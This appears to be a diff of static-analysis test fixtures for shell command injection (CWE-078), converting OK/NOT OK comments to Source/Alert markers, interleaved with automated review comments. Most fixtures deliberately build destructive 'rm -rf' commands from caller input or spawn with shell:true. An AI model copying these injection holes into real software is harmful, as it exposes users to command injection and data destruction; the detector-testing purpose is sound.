diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 75fda0090000..85d0402a8ae8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js 
@@ -1,134 +1,134 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blah = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.execFile(name, [name]); // OK - cp.execFile(name, name); // OK + cp.execFile(name, [name]); + cp.execFile(name, name); }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.foo.bar = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } function cla() { } -cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK +cla.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports = new cla(); +module.exports.cla = new cla(); function cla2() { } -cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK +cla2.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.bla = new cla2(); module.exports.lib2 = require("./lib2.js") class Cla3 { - constructor(name) { - cp.exec("rm -rf " + name); // NOT OK + constructor(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - static foo(name) { - cp.exec("rm -rf " + name); // NOT OK + static foo(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - bar(name) { - cp.exec("rm -rf " + name); // NOT OK + bar(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.exec("rm -rf " + notASource); // OK + cp.exec("rm -rf " + notASource); } } module.exports.cla3 = Cla3; -module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // NOT OK. 
+module.exports.mz = function (name) { // $ Source + require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink } -module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // NOT OK. +module.exports.flow = function (name) { // $ Source + var cmd1 = "rm -rf " + name; // $ Alert Sink cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // NOT OK. + var cmd2 = "rm -rf " + name; // $ Alert Sink function myExec(cmd) { cp.exec(cmd); } myExec(cmd2); } -module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // NOT OK. +module.exports.stringConcat = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.exec(name); // OK. + cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // NOT OK. + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink - cp.exec("cat /foO/BAR/" + name) // NOT OK. + cp.exec("cat /foO/BAR/" + name) // $ Alert Sink - cp.exec("cat \"" + name + "\"") // NOT OK. + cp.exec("cat \"" + name + "\"") // $ Alert Sink - cp.exec("cat '" + name + "'") // NOT OK. + cp.exec("cat '" + name + "'") // $ Alert Sink - cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink - cp.exec(name + " some file") // OK. + cp.exec(name + " some file") } -module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // NOT OK. +module.exports.arrays = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var args1 = ["node"]; - args1.push(name); // NOT OK. + args1.push(name); // $ Alert cp.exec(args1.join(" ")); - cp.exec(["rm -rf", name].join(" ")); // NOT OK. + cp.exec(["rm -rf", name].join(" ")); // $ Alert - cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. 
+ cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // $ Alert - cp.execFile("rm", ["-rf", name]); // OK + cp.execFile("rm", ["-rf", name]); } var util = require("util"); -module.exports.format = function (name) { - cp.exec(util.format("rm -rf %s", name)); // NOT OK +module.exports.format = function (name) { // $ Source + cp.exec(util.format("rm -rf %s", name)); // $ Alert - cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '%s'", name)); // $ Alert - cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // $ Alert - cp.exec(util.format("%s foo/bar", name)); // OK + cp.exec(util.format("%s foo/bar", name)); - cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + cp.exec(util.format("for foo in (%s) do bar end", name)); - cp.exec(require("printf")('rm -rf %s', name)); // NOT OK + cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } -module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.valid = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isValidName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } -module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.safe = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isSafeName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } class Cla4 { - wha(name) { - cp.exec("rm -rf " + name); // NOT OK + wha(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } static bla(name) { 
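Review bot: Coverage of the direct-assignment export form is lost at the top of this hunk, where `module.exports = function (name)` becomes `module.exports.blah = function (name)` and `module.exports = new cla()` becomes `module.exports.cla = new cla()`. After the change, lib.js only exercises exports reached through a named property, so a regression in how a function or instance assigned straight to `module.exports` is treated as library input would not show up in this file. Other fixtures under lib/ may still cover that shape, but none is visible in this hunk. If the rename is needed only because the second assignment overwrote the first, a one-line comment such as `// direct 'module.exports = ...' export is tested in <fixture file>` would record where that case now lives. The hunk ends inside `class Cla4`, so the rest of that class is not reviewed here.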
@@ -145,20 +145,20 @@ function Cla5(name) { } module.exports.cla5 = new Cla5(); -module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // NOT OK +module.exports.indirect = function (name) { // $ Source + let cmd = "rm -rf " + name; // $ Alert Sink let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); } -module.exports.indirect2 = function (name) { +module.exports.indirect2 = function (name) { // $ Source let cmd = name; let sh = "sh"; let args = ["-c", cmd]; - cp.spawn(sh, args, cb); // OK + cp.spawn(sh, args, cb); - let cmd2 = "rm -rf " + name; + let cmd2 = "rm -rf " + name; // $ Alert Sink var args2 = [cmd2]; cp.spawn( 'cmd.exe', 
@@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) { ); } -module.exports.cmd = function (command, name) { - cp.exec("fo | " + command); // OK +module.exports.cmd = function (command, name) { // $ Source + cp.exec("fo | " + command); - cp.exec("fo | " + name); // NOT OK + cp.exec("fo | " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { +module.exports.sanitizer = function (name) { // $ Source var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); - var broken = "'" + name.replace(/'/g, "'\''") + "'" - cp.exec("rm -rf " + broken); // NOT OK + var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + broken); // $ Alert Sink } var path = require("path"); -module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.guard = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!path.exist(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } -module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blacklistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } } -module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.whitelistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } 
-module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blackList2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink process.exit(-1); } - cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } -module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.accessSync = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { 
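Review bot: The guard in `blackList2` uses the regex literal `/^([a-zA-Z0-9]+))?$/`, which has an unmatched `)`, so the new `SPURIOUS: Alert` expectation on the last `cp.exec` may not be measuring what its reason says. If that literal does not parse, the guard cannot act as a sanitizer however flow through `process.exit()` is tracked. Consider balancing it, `if (!/^([a-zA-Z0-9]+)?$/.test(name)) {`, and re-checking whether the spurious alert remains. The regex line is unchanged context in the hunk that starts at `@@ -167,65 +167,65 @@`.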
@@ -245,40 +245,40 @@ var cleanInput = function (s) { return s; } -module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.goodSanitizer = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // OK - But FP due to SanitizingRegExpTest not being able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); -module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.guard2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // NOT OK + cp.exec("rm -rf prefix/" + name); // $ Alert Sink return; } - cp.exec("rm -rf prefix/" + name); // OK + cp.exec("rm -rf prefix/" + name); } -module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // NOT OK +module.exports.sanitizerProperty = function (obj) { // $ Source + cp.exec("rm -rf " + obj.version); // $ Alert Sink obj.version = ""; - cp.exec("rm -rf " + obj.version); // OK + cp.exec("rm -rf " + obj.version); } module.exports.Foo = class Foo { - start(opts) { - cp.exec("rm -rf " + opts.bla); // NOT OK + start(opts) { // $ Source + cp.exec("rm -rf " + opts.bla); // $ Alert Sink this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // NOT OK + cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink } } 
@@ -304,25 +304,25 @@ function sanitizeShellString(str) { return result } -module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = sanitizeShellString(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } -module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.typeofcheck = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (typeof name === "undefined") { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK +module.exports.typeofcheck = function (arg) { // $ Source + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink cp.exec(cmd); } @@ -333,22 +333,22 @@ function id(x) { module.exports.id = id; module.exports.unproblematic = function() { - cp.exec("rm -rf " + id("test")); // OK + cp.exec("rm -rf " + id("test")); }; -module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // NOT OK +module.exports.problematic = function(n) { // $ Source + cp.exec("rm -rf " + id(n)); // $ Alert Sink }; module.exports.typeofNumber = function(n) { if (typeof n === "number") { - cp.exec("rm -rf " + n); // OK + cp.exec("rm -rf " + n); } }; -function boundProblem(safe, unsafe) { - cp.exec("rm -rf " + safe); // OK - cp.exec("rm -rf " + unsafe); // NOT OK +function boundProblem(safe, unsafe) { // $ Source + cp.exec("rm -rf " + safe); + cp.exec("rm -rf " + unsafe); // $ Alert Sink } Object.defineProperty(module.exports, "boundProblem", { 
@@ -363,8 +363,8 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // NOT OK - cp.exec(command); + var command = "learn " + this.learn_args + " " + model; // $ MISSING: Alert - lack of local field step + cp.exec(command); } }; module.exports.MyTrainer = MyTrainer; 
@@ -402,30 +402,30 @@ function yetAnohterSanitizer(str) { return result; } -module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer3 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = yetAnohterSanitizer(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } const cp = require("child_process"); const spawn = cp.spawn; -module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.shellOption = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK - cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK - cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK - cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert + cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert + cp.execFileSync("rm", ["-rf", name], {shell: true}); // $ Alert + cp.spawnSync("rm", ["-rf", name], {shell: true}); // $ Alert const SPAWN_OPT = {shell: true}; - spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; - arr.push(name); // NOT OK - spawn("rm", arr, SPAWN_OPT); - spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. + arr.push(name); // $ Alert + spawn("rm", arr, SPAWN_OPT); // $ Alert + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // $ Alert } function build(first, last) { 
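Review bot: In `shellOption`, the call `spawn("rm", build("node", ...), SPAWN_OPT)` lost its explanation that the alert location is down in `build` and now carries a bare `// $ Alert`; `spawn("rm", arr, SPAWN_OPT)`, which had no marker before, gets one too. From the fixture alone a reader cannot tell whether these tags mark a new alert location or the sink of the alert reported at `arr.push(name)`. Keep the reason after the tag, for example `// $ Alert - the tainted array is built in build()`.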
@@ -433,18 +433,18 @@ function build(first, last) { if (something() === 'gm') arr.push('convert'); first && arr.push(first); - last && arr.push(last); // NOT OK + last && arr.push(last); // $ Alert return arr; }; var asyncExec = require("async-execute"); -module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // NOT OK +module.exports.asyncStuff = function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } const myFuncs = { - myFunc: function (name) { - asyncExec("rm -rf " + name); // NOT OK + myFunc: function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } }; @@ -474,13 +474,13 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports = function check(config) { - const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK +module.exports.check = function check(config) { // $ Source + const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } -module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // NOT OK +module.exports.splitConcat = function (name) { // $ Source + let args = ' my name is ' + name; // $ Alert Sink let cmd = 'echo'; cp.exec(cmd + args); } @@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) { cp: require('child_process') }; - module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // NOT OK + module.exports.myIndirectThing = function (name) { // $ Source + MyThing.cp.exec("rm -rf " + name); // $ Alert Sink } }); 
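Review bot: The `check` export in the `@@ -474,13 +474,13 @@` hunk changes fixture code, not only its annotation: `module.exports = function check(config)` becomes `module.exports.check = function check(config)`. The old form replaced the whole exports object part-way through the file, so the new form presumably keeps the other `module.exports.*` functions exported, but nothing in the hunk says so. A short comment above it, such as `// exported as a property so the earlier exports are not replaced`, would record why the fixture now differs from the original test.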
@@ -506,91 +506,91 @@ for (var name in imp){ module.exports[name] = imp[name]; } -module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer4 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isNaN(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.shellThing = function (name) { +module.exports.shellThing = function (name) { // $ Source function indirectShell(cmd, args, spawnOpts) { - cp.spawn(cmd, args, spawnOpts); // NOT OK + cp.spawn(cmd, args, spawnOpts); // $ Alert } - - indirectShell("rm", ["-rf", name], {shell: true}); + + indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert } -module.exports.badSanitizer = function (name) { +module.exports.badSanitizer = function (name) { // $ Source if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm 
-rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // OK + exec("rm -rf " + name); } } -module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.safeWithBool = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name) === true) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } function indirectThing(name) { 
@@ -605,37 +605,37 @@ function moreIndirect(name) { return indirectThing2(name) !== false; } -module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.veryIndeirect = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (indirectThing(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (indirectThing2(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { - var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // NOT OK +module.exports.sanitizer = function (name) { // $ Source + var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + sanitized); // $ Alert Sink var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var sanitized = "'" + name.replace(new RegExp("\'", unknownFlags()), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK -- Most likely should be okay and not flagged to reduce false positives. + cp.exec("rm -rf " + sanitized); // OK - Most likely should be okay and not flagged to reduce false positives. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index db1ecd02413f..9c427622c770 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js 
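Review bot: The last case in this `sanitizer` function keeps a free-form `// OK - Most likely should be okay and not flagged to reduce false positives.` while every other non-alerting line in the hunk had its `// OK` removed. With `unknownFlags()` the replace may not be global, in which case only the first quote is escaped, so this line records an accepted false negative rather than code known to be safe. Say that directly, e.g. `// OK - flags unknown; treated as global to avoid false positives`.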
+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js index b107ac03d7ae..1f512e8c3817 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // OK, is not exported to a main-module. + cp.exec("rm -rf " + name); // OK - is not exported to a main-module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index a594c2182392..e268f47c4e20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js 
@@ -1,5 +1,5 @@ const cp = require("child_process"); -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index 6e7d3498723d..0b1abc951286 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); -module.exports.arrToShell = function (cmd, arr) { - cp.spawn("echo", arr, {shell: true}); // NOT OK +module.exports.arrToShell = function (cmd, arr) { // $ Source + cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index 1e945f15e724..e6b7a10bacf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -export default function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +export default function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index c46fed331815..853e144a0d62 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 9fa88413cc88..f28c157a5ead 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js index 820349c5c62f..505f4e7af78a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js @@ -3,6 +3,6 @@ const dispatch = { POST: require("./subsub"), }; -module.exports.foo = function (name, type) { +module.exports.foo = function (name, type) { // $ Source dispatch[type](name); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index 952288a82cef..b8da58006c7c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = 